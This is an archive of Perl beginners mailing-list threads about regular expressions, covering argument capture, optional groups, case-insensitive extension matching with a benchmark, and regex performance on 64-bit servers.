subject:"RegExp"

Re: multiple named captures with a single regexp

2017-03-01 Thread Chas. Owens

/(\w+)/g gets the command as well and only the args are wanted, so it would
need to be

my @args = $s =~ / (\w+)/g;
shift @args;

also,

my VAR if TEST;

is deprecated IIRC and slated to be removed soon (as it's behavior is
surprising).  It would probably be better to say

my @args = $s =~ /^\w+\s/ && $s =~ /(?:\s+(\w+))/g;

or (if you don't like using && like that)

my @args = $s =~ /^\w+\s/ ? $s =~ /(?:\s+(\w+))/g : ();



On Wed, Mar 1, 2017 at 9:34 AM X Dungeness  wrote:

> On Wed, Mar 1, 2017 at 2:52 AM, Chas. Owens  wrote:
> > Sadly, Perl will only capture the last match of capture with a
> qualifier, so
> > that just won't work.  The split function really is the simplest and most
> > elegant solution for this sort of problem (you have a string with a
> > delimiter and you want the pieces).  All of that said, if you are
> willing to
> > modify the regex you can say
> >
> > my $s = "command arg1 arg2 arg3 arg4";
> > my @args = $s =~ /(?:\s+(\w+))/g;
> >
>
> Hm, I'd write it as:
>  my @args = $s =~ / (\w+)/g;
>
> or, if the command check isn't too inelegant:
>
>  my @args =  $s =~ / (\w+)/g if $str =~ /^command\s/;
>
>
> > for my $arg (@args) {
> > print "$arg\n";
> > }
> >
> > However, this does not allow you to check the command is correct.
> >
>

Re: multiple named captures with a single regexp

2017-03-01 Thread X Dungeness

On Wed, Mar 1, 2017 at 2:52 AM, Chas. Owens  wrote:
> Sadly, Perl will only capture the last match of capture with a qualifier, so
> that just won't work.  The split function really is the simplest and most
> elegant solution for this sort of problem (you have a string with a
> delimiter and you want the pieces).  All of that said, if you are willing to
> modify the regex you can say
>
> my $s = "command arg1 arg2 arg3 arg4";
> my @args = $s =~ /(?:\s+(\w+))/g;
>

Hm, I'd write it as:
 my @args = $s =~ / (\w+)/g;

or, if the command check isn't too inelegant:

 my @args =  $s =~ / (\w+)/g if $str =~ /^command\s/;


> for my $arg (@args) {
> print "$arg\n";
> }
>
> However, this does not allow you to check the command is correct.
>

-- 
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

Re: multiple named captures with a single regexp

2017-03-01 Thread Chas. Owens

Sadly, Perl will only capture the last match of capture with a qualifier,
so that just won't work.  The split function really is the simplest and
most elegant solution for this sort of problem (you have a string with a
delimiter and you want the pieces).  All of that said, if you are willing
to modify the regex you can say

my $s = "command arg1 arg2 arg3 arg4";
my @args = $s =~ /(?:\s+(\w+))/g;

for my $arg (@args) {
print "$arg\n";
}

However, this does not allow you to check the command is correct.

Another option, and I would in no way claim this is an elegant solution, is
to use code execution in the middle of the regex with (?{}) to pull out the
matched fields:

@args = ();

my $start;
$s =~ m{
\w+ # command
\s
(?{$start = pos;}) # capture the first start position
(?:
\w+ # the argument
# capture the argument
(?{ push @args, substr $s, $start, pos() - $start; })
# optional delimiter and capture the next start
(?: \s+ (?{ $start = pos; }))?
)+
}x;

for my $arg (@args) {
print "$arg\n";
}

Of course, all of these solutions are bound to fail when you hit the real
world (assuming the command is a Unix command) as arguments are allowed to
have spaces in them if they are quoted.  There is a way to do this with
regex, but balancing the quotes is far more pain than it is worth.  A
simple regex to tokenize the string plus some logic to put the quoted
sections back together will allow you to extract the arguments from the
string:

#!/usr/bin/perl

use strict;
use warnings;

my $s = qq("command with space" arg1 "arg 2" "arg3");

my @parts = $s =~ /([ ]+|"|\w+)/g;

my @args;
my $in_string = 0;
my $buf = "";
while (@parts) {
my $part = shift @parts;

# ditch the delimiters if not in a string
next if not $in_string and $part =~ / /;

# in strings, a " means end the string
# otherwise, just build up a buffer of the things
# in the string
if ($in_string) {
if ($part eq '"') {
$in_string = 0;
push @args, $buf;
$buf = "";
} else {
$buf .= $part;
}
next;
}

# if not in a string, " means start a string
if ($part eq '"') {
$in_string = 1;
next;
}

# if not a delimiter or a ", then this is just a normal token
push @args, $part;
}

shift @args; #ditch the command

for my $arg (@args) {
print "$arg\n";
}

Of course, this still doesn't handle Unix commands properly as you can
escape " and use ' to create strings, but those details are left as an
exercise for the reader.

On Wed, Mar 1, 2017 at 4:04 AM Luca Ferrari <fluca1...@infinito.it> wrote:

> Hi all,
> I'm not sure if this is possible, but imagine I've got a line as follows:
>
> command arg1 arg2 arg3 arg4 ...
>
> I would like to capture all args with a single regexp, possibly with a
> named capture, but I don't know exactly how to do:
>
> my $re = qr/command\s+(?\w+)+/;
>
> the above of course is going to capture only the first one (one shoot)
> or the last one within a loop.
> How can I extract the whole array of arguments?
>
> Please note, a raw solution is to remove the command and split, but
> I'm asking for a more elegant solution.
>
> Thanks,
> Luca
>
> --
> To unsubscribe, e-mail: beginners-unsubscr...@perl.org
> For additional commands, e-mail: beginners-h...@perl.org
> http://learn.perl.org/
>
>
>

Re: multiple named captures with a single regexp

2017-03-01 Thread Shlomi Fish

Hi Luca,

On Wed, 1 Mar 2017 10:01:34 +0100
Luca Ferrari <fluca1...@infinito.it> wrote:

> Hi all,
> I'm not sure if this is possible, but imagine I've got a line as follows:
> 
> command arg1 arg2 arg3 arg4 ...
> 
> I would like to capture all args with a single regexp, possibly with a
> named capture, but I don't know exactly how to do:
> 
> my $re = qr/command\s+(?\w+)+/;
> 
> the above of course is going to capture only the first one (one shoot)
> or the last one within a loop.
> How can I extract the whole array of arguments?
> 

Perhaps try using \G and the /g and possibly /o flags , see:

http://perl-begin.org/uses/text-parsing/

(Note that perl-begin is a site that I maintain).

Regards,

Shlomi Fish


> Please note, a raw solution is to remove the command and split, but
> I'm asking for a more elegant solution.
> 
> Thanks,
> Luca
> 



-- 
-
Shlomi Fish   http://www.shlomifish.org/
Freecell Solver - http://fc-solve.shlomifish.org/

It is a good idea to stop worrying about problems (or “problems” in quotes)
that cannot be fixed.

--
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

multiple named captures with a single regexp

2017-03-01 Thread Luca Ferrari

Hi all,
I'm not sure if this is possible, but imagine I've got a line as follows:

command arg1 arg2 arg3 arg4 ...

I would like to capture all args with a single regexp, possibly with a
named capture, but I don't know exactly how to do:

my $re = qr/command\s+(?\w+)+/;

the above of course is going to capture only the first one (one shoot)
or the last one within a loop.
How can I extract the whole array of arguments?

Please note, a raw solution is to remove the command and split, but
I'm asking for a more elegant solution.

Thanks,
Luca

-- 
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

Re: Regexp under PERL

2015-07-08 Thread Kent Fredric

On 8 July 2015 at 19:12, Nagy Tamas (TVI-GmbH) tamas.n...@tvi-gmbh.de wrote:
 This is the code:

 } elsif (defined($row)  ($row =~ m/\(\*[ ]+\\@PATH\[ ]+:=[ 
 ]+'(\/)?([\*A-Za-z_ ]*(\/)?)+'[ ]\*\)?/)) {
  # PATH  first version:   \(\*[ ]+@PATH[ ]+:=[ ]+'(\\/)?([\*A-Za-z_ 
 ]*(\\/)?)+'[ ]\*\)?

  my @path = split(':=', $row, 2);
  $temppath = $path[1];
  my trimmedpath = split(''', $temppath, 3);

  $currentpath = trimmedpath[1];

 The last )) ist he closing of the elsif. Sorry. Still no idea.

 Tamas Nagy

Again, you're just bolting stuff together in the email client thinking
its the code. There's no way that can work. The most obvious here you
have three quote marks in split() meaning everything after that is
nonsense.

Then you use variables without sigils ( which is also nonsense under strict )

And you entirely forget to declare variables ( again, nonsense under strict ).

When you eliminate all those superficial defects, the code has no
bugs, and executes silently without so much as a squeak.

Attached is what I have, and it doesn't replicate the problem.

-- 
Kent

KENTNL - https://metacpan.org/author/KENTNL


x.pl
Description: Perl program
-- 
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

AW: Regexp under PERL

2015-07-08 Thread Nagy Tamas (TVI-GmbH)

Hi,

This is the code:

} elsif (defined($row)  ($row =~ m/\(\*[ ]+\\@PATH\[ ]+:=[ 
]+'(\/)?([\*A-Za-z_ ]*(\/)?)+'[ ]\*\)?/)) {
 # PATH  first version:   \(\*[ ]+@PATH[ ]+:=[ ]+'(\\/)?([\*A-Za-z_ 
]*(\\/)?)+'[ ]\*\)?
 
 my @path = split(':=', $row, 2);
 $temppath = $path[1];
 my trimmedpath = split(''', $temppath, 3);
 
 $currentpath = trimmedpath[1];

The last )) ist he closing of the elsif. Sorry. Still no idea.

Tamas Nagy

 
 

-Ursprüngliche Nachricht-
Von: Kent Fredric [mailto:kentfred...@gmail.com] 
Gesendet: Dienstag, 7. Juli 2015 19:03
An: Nagy Tamas (TVI-GmbH)
Cc: beginners@perl.org
Betreff: Re: Regexp under PERL

On 8 July 2015 at 04:40, Nagy Tamas (TVI-GmbH) tamas.n...@tvi-gmbh.de wrote:
 m/\(\*[ ]+\\@PATH\[ ]+:=[ ]+'(\/)?([\*A-Za-z_ ]*(\/)?)+'[ ]\*\)?/))

This is not the exact code you 're using obviously, because the last 2 ) 
marks are actually outside the regex.

Removing those ))'s makes the regex compile just fine.

So we need the code, not just the regex.

Ideally, if you can give some perl code that is minimal that replicates your 
problem exactly, then that would be very helpful in us helping you.

Ideally, your code should be reduced as far as possible till you have the least 
possible amount of code that demonstrates your problem.

Additional notes:  Values in @PATH are not relevant to your expression, because 
you explicitly escape the @ to mean a literal @.
If you did not escape it, it would have interpolated.

But even then, I'd still have no idea what you are doing :)

--
Kent

KENTNL - https://metacpan.org/author/KENTNL

Regexp under PERL

2015-07-07 Thread Nagy Tamas (TVI-GmbH)

Hi,

PERL shows this line ok, but for the next lines it tells: String found where 
operator expected at line...

m/\(\*[ ]+\\@PATH\[ ]+:=[ ]+'(\/)?([\*A-Za-z_ ]*(\/)?)+'[ ]\*\)?/))

So it seems that it is not ok.

I have the proper regexp that was tested at  http://www.regexr.com/

# Tested version:   \(\*[ ]+@PATH[ ]+:=[ ]+'(\\/)?([\*A-Za-z_ ]*(\\/)?)+'[ 
]\*\)?

Input data:

(* @PATH := '\/ph\/** Forest\/Apple' *)
(* @PATH := '\/ph\/** Forest\/Pear' *)
(* @PATH := '\/ph\/** Forest\/Tree\/Plum' *)
(* @PATH := '\/ph\/** Forest\/Oaktree\/Oak' *)

If I use the tested version, it tells: Unmatched ( in regex; marked by -- HERE 
in
m/..:=[ ]+'(  -- HERE at . line

Tamas

Re: Regexp under PERL

2015-07-07 Thread Kent Fredric

On 8 July 2015 at 04:40, Nagy Tamas (TVI-GmbH) tamas.n...@tvi-gmbh.de wrote:
 m/\(\*[ ]+\\@PATH\[ ]+:=[ ]+'(\/)?([\*A-Za-z_ ]*(\/)?)+'[ ]\*\)?/))

This is not the exact code you 're using obviously, because the last 2
) marks are actually outside the regex.

Removing those ))'s makes the regex compile just fine.

So we need the code, not just the regex.

Ideally, if you can give some perl code that is minimal that
replicates your problem exactly, then that would be very helpful in us
helping you.

Ideally, your code should be reduced as far as possible till you have
the least possible amount of code that demonstrates your problem.

Additional notes:  Values in @PATH are not relevant to your
expression, because you explicitly escape the @ to mean a literal @.
If you did not escape it, it would have interpolated.

But even then, I'd still have no idea what you are doing :)

-- 
Kent

KENTNL - https://metacpan.org/author/KENTNL

-- 
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

Re: is faster a regexp with multiple choices or a single one with lower case?

2015-01-08 Thread Luca Ferrari

Hi Bill,

On Thu, Jan 8, 2015 at 1:36 AM, $Bill n...@todbe.com wrote:
 Why not just ignore the case ?

Sure it's an option.

 Why does the script care what the case is ?  Is there a rationale for
 checking it ?

Of course there's, and of course my script does different things
depending on what I'm looking at.
I have just posted a short example to discuss about regular
expressions, not about the particular case in my script (that is, by
the way, quite simple).

Thanks,
Luca

-- 
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

Re: is faster a regexp with multiple choices or a single one with lower case?

2015-01-08 Thread David Precious

On Wed, 7 Jan 2015 10:59:07 +0200
Shlomi Fish shlo...@shlomifish.org wrote:
 Anyway, one can use the Benchmark.pm module to determine which
 alternative is faster, but I suspect their speeds are not going to be
 that much different. See:
 
 http://perl-begin.org/topics/optimising-and-profiling/
 
 (Note: perl-begin.org is a site I originated and maintain).

And this is the answer I'd give - if you're curious as to which of two
approaches will be faster, benchmark it and find out.  It's often
better to do this yourself, as the results may in some cases vary widely
depending on the system you're running it on, the perl version, how
Perl was built, etc.

The sure-fire way to see which of multiple options is faster is to use
Benchmark.pm to try them and find out :)

For an example, I used the following (dirty) short script to set up
1,000 test filenames with random lengths and capitalisation, half of
which should match the pattern, and testing each approach against all
of those test filenames, 10,000 times:


[davidp@supernova:~]$ cat tmp/benchmark_lc.pl 
#!/usr/bin/perl

use strict;
use Benchmark;

# Put together an array of various test strings, with random
# lengths and case
my @valid_chars = ('a'..'z', 'A'..'Z');
my @test_data = map { 
join('', map { $valid_chars[int rand @valid_chars] } 1..rand(10))
. (rand  0.5 ? '.bat' : '.bar')
} (1..1000);

Benchmark::cmpthese(10_000,
{
lc_first = sub {
for my $string (@test_data) {
$string = lc $string;
if ($string =~ /\.bat$/) {
}
}
},
regex_nocase = sub {
for my $string (@test_data) {
if ($string =~ /\.bat$/i) {
}
}
},
},
);




And my results suggest that, for me, using lc() on the string first
before attempting to match was around 30% faster:


[davidp@supernova:~]$ perl tmp/benchmark_lc.pl 
   Rate regex_nocase lc_first
regex_nocase 2674/s   -- -24%
lc_first 3509/s  31%   --


Of course, YMMV.



-- 
David Precious (bigpresh) dav...@preshweb.co.uk
http://www.preshweb.co.uk/ www.preshweb.co.uk/twitter
www.preshweb.co.uk/linkedinwww.preshweb.co.uk/facebook
www.preshweb.co.uk/cpanwww.preshweb.co.uk/github



-- 
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

Re: is faster a regexp with multiple choices or a single one with lower case?

2015-01-07 Thread Shlomi Fish

On Wed, 7 Jan 2015 07:56:18 +
Andrew Solomon and...@geekuni.com wrote:

 Hi Luca,
 
 I haven't tested it, but my suspicion is that your first solution will
 be faster because regular expressions (which don't contain variables)
 are only compiled once, while you have a function call for every use
 of lc.
 
 By the way another alternative might be:
 
 $extention =~ /\.bat/i
 
 (which would also match BaT, BAt...)
 

The second code excerpt that was given will also match all that:

«
$extension = lc $extension;
$extension =~ / \.bat /x;
»

Anyway, one can use the Benchmark.pm module to determine which alternative is
faster, but I suspect their speeds are not going to be that much different. See:

http://perl-begin.org/topics/optimising-and-profiling/

(Note: perl-begin.org is a site I originated and maintain).

Regards,

Shlomi Fish

-- 
-
Shlomi Fish   http://www.shlomifish.org/
Perl Humour - http://perl-begin.org/humour/

John: Hey, we are completely non-violent vampires. We don’t suck blood.
Selina: I thought all vampires suck blood.
John: Bullocks, hen. Vampires come in all shapes and sizes.
— http://www.shlomifish.org/humour/Selina-Mandrake/

Please reply to list if it's a mailing list post - http://shlom.in/reply .

--
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

is faster a regexp with multiple choices or a single one with lower case?

2015-01-06 Thread Luca Ferrari

Hi all,
this could be trivial, and I suspect the answer is that the regexp
engine is smart enough, but suppose I want to test the following:

$extention =~ / \.bat | \.BAT /x;

is the following a better solution?

$extension = lc $extension;
$extension =~ / \.bat /x;

In other words, when testing for all-lower or all-upper cases should I
first trasnform to one of them or use a regexp with alternatives?
Any suggestion?

Thanks,
Luca

-- 
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

Re: is faster a regexp with multiple choices or a single one with lower case?

2015-01-06 Thread Andrew Solomon

Hi Luca,

I haven't tested it, but my suspicion is that your first solution will
be faster because regular expressions (which don't contain variables)
are only compiled once, while you have a function call for every use
of lc.

By the way another alternative might be:

$extention =~ /\.bat/i

(which would also match BaT, BAt...)

Andrew

On Wed, Jan 7, 2015 at 7:45 AM, Luca Ferrari fluca1...@infinito.it wrote:
 Hi all,
 this could be trivial, and I suspect the answer is that the regexp
 engine is smart enough, but suppose I want to test the following:

 $extention =~ / \.bat | \.BAT /x;

 is the following a better solution?

 $extension = lc $extension;
 $extension =~ / \.bat /x;

 In other words, when testing for all-lower or all-upper cases should I
 first trasnform to one of them or use a regexp with alternatives?
 Any suggestion?

 Thanks,
 Luca

 --
 To unsubscribe, e-mail: beginners-unsubscr...@perl.org
 For additional commands, e-mail: beginners-h...@perl.org
 http://learn.perl.org/





-- 
Andrew Solomon

Mentor@Geekuni http://geekuni.com/
http://www.linkedin.com/in/asolomon

-- 
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

RegExp

2014-03-08 Thread rakesh sharma

Hi all,
how do you get all words starting with letter 'r' in a string.
thanks,rakesh

Re: RegExp

2014-03-08 Thread Shawn H Corey

On Sat, 8 Mar 2014 18:20:48 +0530
rakesh sharma rakeshsharm...@hotmail.com wrote:

 Hi all,
 how do you get all words starting with letter 'r' in a string.
 thanks,rakesh
 

/\br/


-- 
Don't stop where the ink does.
Shawn

-- 
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

Re: RegExp

2014-03-08 Thread Shlomi Fish

Hello Rakesh,

On Sat, 8 Mar 2014 18:20:48 +0530
rakesh sharma rakeshsharm...@hotmail.com wrote:

 Hi all,
 how do you get all words starting with letter 'r' in a string.
 thanks,rakesh
 

1. Find all words in the sentence. Your idea of what is a word will need to be
specified.

2. Put them in an array - let's say @words.

3. Use « grep { /\Ar/i } @words » . See: 

* http://perldoc.perl.org/functions/grep.html

* https://metacpan.org/pod/List::MoreUtils

* https://metacpan.org/pod/List::Util

Regards,

— Shlomi Fish

-- 
-
Shlomi Fish   http://www.shlomifish.org/
Escape from GNU Autohell - http://www.shlomifish.org/open-source/anti/autohell/

There is an IGLU Cabal, but its only purpose is to deny the existence of an
IGLU Cabal.
— Martha Greenberg

Please reply to list if it's a mailing list post - http://shlom.in/reply .

--
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

Re: RegExp

2014-03-08 Thread Janek Schleicher


Am 08.03.2014 13:50, schrieb rakesh sharma:

how do you get all words starting with letter 'r' in a string.


What have you tried so far?


Greetings,
Janek


--
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

Re: RegExp

2014-03-08 Thread Jim Gibson


On Mar 8, 2014, at 4:50 AM, rakesh sharma rakeshsharm...@hotmail.com wrote:

 Hi all,
 
 how do you get all words starting with letter 'r' in a string.

Try

  my @rwords = $string =~ /\br\w*?\b/g;

-- 
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

Re: regexp puzzle

2014-03-08 Thread Bill McCormick


On 3/8/2014 12:05 AM, Bill McCormick wrote:

I have the following string I want to extract from:

my $str = foo (3 bar): baz;

and I want to to extract to end up with

$p1 = foo;
$p2 = 3;
$p3 = baz;

the complication is that the \s(\d\s.+) is optional, so in then $p2 may
not be set.

getting close was

my ($p1, $p3) = $str =~ /^(.+):\s(.*)$/;

How can I make the  (3 bar) optional.



Here's what I came up with:

($key, $lines, $value) = $_ =~ /^(.+?)(?:\s\((\d)\s.+\))?:\s(.*)$/;


---
This email is free from viruses and malware because avast! Antivirus protection 
is active.
http://www.avast.com



--
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

regexp puzzle

2014-03-07 Thread Bill McCormick


I have the following string I want to extract from:

my $str = foo (3 bar): baz;

and I want to to extract to end up with

$p1 = foo;
$p2 = 3;
$p3 = baz;

the complication is that the \s(\d\s.+) is optional, so in then $p2 may 
not be set.


getting close was

my ($p1, $p3) = $str =~ /^(.+):\s(.*)$/;

How can I make the  (3 bar) optional.

Thanks!

---
This email is free from viruses and malware because avast! Antivirus protection 
is active.
http://www.avast.com



--
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

Re: regexp puzzle

2014-03-07 Thread shawn wilson

([^]+) \(([0-9]+).*\) ([a-z]+)
On Mar 8, 2014 1:07 AM, Bill McCormick wpmccorm...@gmail.com wrote:

 I have the following string I want to extract from:

 my $str = foo (3 bar): baz;

 and I want to to extract to end up with

 $p1 = foo;
 $p2 = 3;
 $p3 = baz;

 the complication is that the \s(\d\s.+) is optional, so in then $p2 may
 not be set.

 getting close was

 my ($p1, $p3) = $str =~ /^(.+):\s(.*)$/;

 How can I make the  (3 bar) optional.

 Thanks!

 ---
 This email is free from viruses and malware because avast! Antivirus
 protection is active.
 http://www.avast.com



 --
 To unsubscribe, e-mail: beginners-unsubscr...@perl.org
 For additional commands, e-mail: beginners-h...@perl.org
 http://learn.perl.org/

Re: regexp puzzle

2014-03-07 Thread Bill McCormick


On 3/8/2014 12:41 AM, shawn wilson wrote:

my $str = foo (3 bar): baz;


my $test = foo (3 bar): baz;
my ($p1, $p2, $p3) = $test =~ /([^]+) \(([0-9]+).*\) ([a-z]+)/;
print p1=[$p1] p2=[$p2] p3=[$p3]\n;

Use of uninitialized value $p1 in concatenation (.) or string at 
./lock_report.pl line 11.
Use of uninitialized value $p2 in concatenation (.) or string at 
./lock_report.pl line 11.
Use of uninitialized value $p3 in concatenation (.) or string at 
./lock_report.pl line 11.

p1=[] p2=[] p3=[]
P

---
This email is free from viruses and malware because avast! Antivirus protection 
is active.
http://www.avast.com



--
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

Re: regexp puzzle

2014-03-07 Thread shawn wilson

On Mar 8, 2014 1:41 AM, shawn wilson ag4ve...@gmail.com wrote:


Oh and per optional, just do (?:\([0-9]+).*\)?
You should probably use do
my @match = $str =~ / ([^]+)  (?:\([0-9]+).*\)? ([a-z]+)/;
my ($a, $b, $c) = (scalar(@match) == 3 ? @match : $match[0], undef,
$match[1]);

 ([^]+) \(([0-9]+).*\) ([a-z]+)

 On Mar 8, 2014 1:07 AM, Bill McCormick wpmccorm...@gmail.com wrote:

 I have the following string I want to extract from:

 my $str = foo (3 bar): baz;

 and I want to to extract to end up with

 $p1 = foo;
 $p2 = 3;
 $p3 = baz;

 the complication is that the \s(\d\s.+) is optional, so in then $p2 may
not be set.

 getting close was

 my ($p1, $p3) = $str =~ /^(.+):\s(.*)$/;

 How can I make the  (3 bar) optional.

 Thanks!

 ---
 This email is free from viruses and malware because avast! Antivirus
protection is active.
 http://www.avast.com



 --
 To unsubscribe, e-mail: beginners-unsubscr...@perl.org
 For additional commands, e-mail: beginners-h...@perl.org
 http://learn.perl.org/

Re: regexp puzzle

2014-03-07 Thread Jim Gibson


On Mar 7, 2014, at 10:05 PM, Bill McCormick wpmccorm...@gmail.com wrote:

 I have the following string I want to extract from:
 
 my $str = foo (3 bar): baz;
 
 and I want to to extract to end up with
 
 $p1 = foo;
 $p2 = 3;
 $p3 = baz;
 
 the complication is that the \s(\d\s.+) is optional, so in then $p2 may not 
 be set.
 
 getting close was
 
 my ($p1, $p3) = $str =~ /^(.+):\s(.*)$/;


You can make a substring optional by following it with the ? quantifier. If you 
substring is more than one character, you can group it with capturing 
parentheses or a non-capturing grouping construct (?: ).

Here is a sample, using the extended regular expression syntax with the x 
option:

my( $p1, $p2, $p3 ) = $str =~ m{ \A (\w+) \s+ (?: \( (\d+) \s+ \w+ \) )? : \s 
(\w+) }x;
if( $p1  $p3 ) {
print “p1=$p1, p2=$p2, p3=$p3\n”;
}else{
print “No match\n”;
}

Always test the returned values to see if the match succeeded.

So if '(3 bar)’ is not present, does the colon still remain? That will 
determine if the colon should be inside or outside the optional substring part.


--
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

perl regexp performance - architecture?

2014-02-17 Thread Phil Smith

I'm currently loading some new servers with CentOS6 on which perl5.10 is
the standard version of perl provided. However, I've also loaded perl5.18
and I don't think the version of perl is significant in the results I'm
seeing. Basically, I'm seeing perl performance significantly slower on my
new systems than on my 6 year old systems.

Here's some of the relevant details:

+ 6 year old server, 32 bit architecture, CentOS5 perl5.8
perl, and in particular regexp operations, perform reasonably fast.

+ Very new server, 64 bit architecture, CentOS6, perl5.10 (and have tried
perl5.18)
perl, and in particular regexp operations, perform significantly slower
than on the 6 year old server. That struck me as odd right off. I though
surely, perl running on a modern high-end cpu is going to beat out my code
running on 6 year old hardware.

I've compared CPU models at various CPU benchmarking sites and the new
CPUs, as you would expect, are ranked significantly higher in performance
than the old.

I've also installed perl5.8 on the new 64bit servers and the performance is
similar to that of perl5.10 and perl5.18 on the same 64bit servers. Given
that, I don't think perl version plays a significant factor is the
performance diffs.

Is it an accepted fact that perl performance takes a hit on 64 bit
architecture?

I've tried comparing some of the perl -V and Config.pm results looking for
significant differences. That output is pretty verbose and the most
significant difference is the architecture.

I could provide some of my benchmarking code if that would be of help. The
differences are significant. The only reason I'm looking at this is because
I could see right off that some of my code is taking 30-40% longer to run
in the new environment. Once I started putting in some timing
with Time::HiRes I could see the delay involved large amounts of regexp
processing.

Right now, I'm just looking for any opinions on what I'm seeing so that I
know the architecture is the significant factor in the performance
degradation and then consider any recommendations for improvements. I'm
happy to provide further relevant details.

Thanks,
Phil

Re: perl regexp performance - architecture?

2014-02-17 Thread Charles DeRykus

On Mon, Feb 17, 2014 at 12:41 PM, Phil Smith philbo...@gmail.com wrote:

I'm currently loading some new servers with CentOS6 on which perl5.10 is
the standard version of perl provided. However, I've also loaded perl5.18
and I don't think the version of perl is significant in the results I'm
seeing. Basically, I'm seeing perl performance significantly slower on my
new systems than on my 6 year old systems.

Here's some of the relevant details:

+ 6 year old server, 32 bit architecture, CentOS5 perl5.8
perl, and in particular regexp operations, perform reasonably fast.

+ Very new server, 64 bit architecture, CentOS6, perl5.10 (and have tried
perl5.18)
perl, and in particular regexp operations, perform significantly slower
than on the 6 year old server. That struck me as odd right off. I though
surely, perl running on a modern high-end cpu is going to beat out my code
running on 6 year old hardware.

I've compared CPU models at various CPU benchmarking sites and the new
CPUs, as you would expect, are ranked significantly higher in performance
than the old.

I've also installed perl5.8 on the new 64bit servers and the performance
is similar to that of perl5.10 and perl5.18 on the same 64bit servers.
Given that, I don't think perl version plays a significant factor is the
performance diffs.

Is it an accepted fact that perl performance takes a hit on 64 bit
architecture?

I've tried comparing some of the perl -V and Config.pm results looking for
significant differences. That output is pretty verbose and the most
significant difference is the architecture.

I could provide some of my benchmarking code if that would be of help. The
differences are significant. The only reason I'm looking at this is because
I could see right off that some of my code is taking 30-40% longer to run
in the new environment. Once I started putting in some timing
with Time::HiRes I could see the delay involved large amounts of regexp
processing.

Right now, I'm just looking for any opinions on what I'm seeing so that I
know the architecture is the significant factor in the performance
degradation and then consider any recommendations for improvements. I'm
happy to provide further relevant details.

This sounds like it could be something OS-specific and, googling
CentOS regex performance generates hits, eg,

http://pkgs.org/centos-5/puias-computational-x86_64/boost141-regex-1.4.0-2.el5.x86_64.rpm.html

HTH,
Charles DeRykus

Re: perl regexp performance - architecture?

2014-02-17 Thread Phil Smith

On Mon, Feb 17, 2014 at 6:16 PM, Charles DeRykus dery...@gmail.com wrote:

On Mon, Feb 17, 2014 at 12:41 PM, Phil Smith philbo...@gmail.com wrote:

Here's some of the relevant details:

+ 6 year old server, 32 bit architecture, CentOS5 perl5.8
perl, and in particular regexp operations, perform reasonably fast.

I've compared CPU models at various CPU benchmarking sites and the new
CPUs, as you would expect, are ranked significantly higher in performance
than the old.

Is it an accepted fact that perl performance takes a hit on 64 bit
architecture?

I've tried comparing some of the perl -V and Config.pm results looking
for significant differences. That output is pretty verbose and the most
significant difference is the architecture.

I could provide some of my benchmarking code if that would be of help.
The differences are significant. The only reason I'm looking at this is
because I could see right off that some of my code is taking 30-40% longer
to run in the new environment. Once I started putting in some timing
with Time::HiRes I could see the delay involved large amounts of regexp
processing.

This sounds like it could be something OS-specific and, googling
CentOS regex performance generates hits, eg,

http://pkgs.org/centos-5/puias-computational-x86_64/boost141-regex-1.4.0-2.el5.x86_64.rpm.html

No, I really don't think it is specific to a version of CentOS. I've
installed various permutations of 32 and 64 bit CentOS 5 and 6. The better
performance seems to follow the 32 bit architecture rather than a specific
Perl version or CentOS version.

Phil

Fwd: perl regexp performance - architecture?

2014-02-17 Thread Charles DeRykus

On Mon, Feb 17, 2014 at 4:25 PM, Phil Smith philbo...@gmail.com wrote:

On Mon, Feb 17, 2014 at 6:16 PM, Charles DeRykus dery...@gmail.comwrote:

On Mon, Feb 17, 2014 at 12:41 PM, Phil Smith philbo...@gmail.com wrote:

Here's some of the relevant details:

+ 6 year old server, 32 bit architecture, CentOS5 perl5.8
perl, and in particular regexp operations, perform reasonably fast.

+ Very new server, 64 bit architecture, CentOS6, perl5.10 (and have
tried perl5.18)
perl, and in particular regexp operations, perform significantly slower
than on the 6 year old server. That struck me as odd right off. I though
surely, perl running on a modern high-end cpu is going to beat out my code
running on 6 year old hardware.

I've compared CPU models at various CPU benchmarking sites and the new
CPUs, as you would expect, are ranked significantly higher in performance
than the old.

Is it an accepted fact that perl performance takes a hit on 64 bit
architecture?

I've tried comparing some of the perl -V and Config.pm results looking
for significant differences. That output is pretty verbose and the most
significant difference is the architecture.

I could provide some of my benchmarking code if that would be of help.
The differences are significant. The only reason I'm looking at this is
because I could see right off that some of my code is taking 30-40% longer
